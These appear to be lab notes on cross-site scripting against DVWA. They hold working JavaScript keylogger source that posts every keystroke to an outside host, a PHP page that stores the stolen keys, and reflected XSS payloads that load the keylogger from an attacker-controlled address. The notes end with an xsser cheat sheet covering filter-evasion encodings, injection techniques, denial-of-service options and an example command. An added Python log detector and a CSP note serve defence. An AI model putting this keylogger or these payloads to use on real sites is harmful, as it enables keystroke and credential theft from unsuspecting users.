XSS
Keylogging
Keylogger.js
Source
document.onkeypress = function (evt) {
    evt = evt || window.event;
    // Translate the keypress into the typed character
    var key = String.fromCharCode(evt.charCode);
    if (key) {
        // Post each character to the receiving page
        var http = new XMLHttpRequest();
        var param = encodeURI(key);
        http.open("POST", "http://1.1.1.1/keylogger.php", true);
        http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        http.send("key=" + param);
    }
};
Page that receives the data (keylogger.php)
<?php
$key = $_POST['key'];
$logfile = "keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
Exploitation
<script+src="http://1.1.1.1/keylogger.js"></script>
Use inside HTML
<a href="http://192.168.20.10/dvwa/vulnerabilities/xss_r/?name=<script+src='http://192.168.20.8/keylogger.js'></script>">xss</a>
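From the defender's side, the reflected request above leaves a recognisable trace in the web server's access log: a query parameter that, once URL-decoded, contains a <script> tag whose src points at a host that is not the site itself. The following Python check is an added example and not part of the original notes; it assumes combined-format access logs, a constructed sample log, and an allowlist of hosts that may legitimately appear in a script src.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real traffic). The first request carries the
# reflected payload shape from the notes above: a <script src=...> pointing at an
# attacker-controlled host inside the vulnerable 'name' parameter.
SAMPLE_LOG = """\
192.168.20.8 - - [10/Oct/2023:12:00:01 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript+src%3D%27http%3A%2F%2F192.168.20.8%2Fkeylogger.js%27%3E%3C%2Fscript%3E HTTP/1.1" 200 512
192.168.20.8 - - [10/Oct/2023:12:00:02 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=alice HTTP/1.1" 200 498
192.168.20.8 - - [10/Oct/2023:12:00:03 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 500
"""

# Request line inside a combined-format log entry: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# An opening <script ...> tag, and a src attribute that loads from an absolute URL
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?\s*(https?://[^'\"\s>]+)", re.I)


def find_script_injections(log_text, allowed_hosts):
    """Return one finding per <script> tag found in a decoded query parameter.

    allowed_hosts: hosts that may legitimately appear in a script src (assumed
    allowlist for this example). Tags loading from any other host are 'external'
    findings, i.e. the remote-keylogger pattern; src-less tags are 'inline'.
    """
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        # parse_qsl percent-decodes and turns '+' into a space, so the
        # '<script+src=...' form in the URL becomes '<script src=...'
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for tag in SCRIPT_TAG_RE.finditer(value):
                src = SRC_RE.search(tag.group(0))
                host = urlsplit(src.group(1)).hostname if src else None
                if host and host in allowed_hosts:
                    continue
                findings.append({
                    "param": param,
                    "kind": "external" if host else "inline",
                    "host": host,
                    "target": target,
                })
    return findings
```

Running it over a real log, a `Content-Security-Policy` with a restrictive `script-src` and `connect-src` is the matching mitigation: it stops both the injected script load and the XHR that ships keystrokes off-site.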
Xsser tool
Command-line / GUI tool
--gtk  launch the graphical interface
Bypassing server-side input filtering
Decimal / hexadecimal encoding
-u "http://1.1.1.1/dvwa/"  specify the target URL
-g "xss_r/?name="  use the GET method
--cookie=""  send a cookie with the requests
-s  show statistics on how many tests were run
-v  verbose output
--reverse-check  by default a hash value is submitted; with this option the real XSS exploit code (reverse-connection code) is submitted instead
--heuristic  heuristic testing; detects which characters are filtered
Encode the payload to bypass server-side filtering
--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem=CEM Try -manually- different Character Encoding Mutations (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
Injection techniques
--Coo Cross Site Scripting Cookie injection
--Xsa Cross Site Agent Scripting
--Xsr Cross Site Referer Scripting
--Dcp Data Control Protocol injections
--Dom Document Object Model injections
--Ind HTTP Response Splitting Induced code
--Anchor Use Anchor Stealth payloader (DOM shadows!)
--Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
--B64 Base64 code encoding in META tag (rfc2397)
--Onm ONM - Use onMouseMove() event to inject code
--Ifr Use <iframe> source tag to inject code
Denial of service
--Doss XSS Denial of service (server) injection
--Dos XSS Denial of service (client) injection
Example
xsser -u "http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" --Cem='Mix,Une,Str,Hex'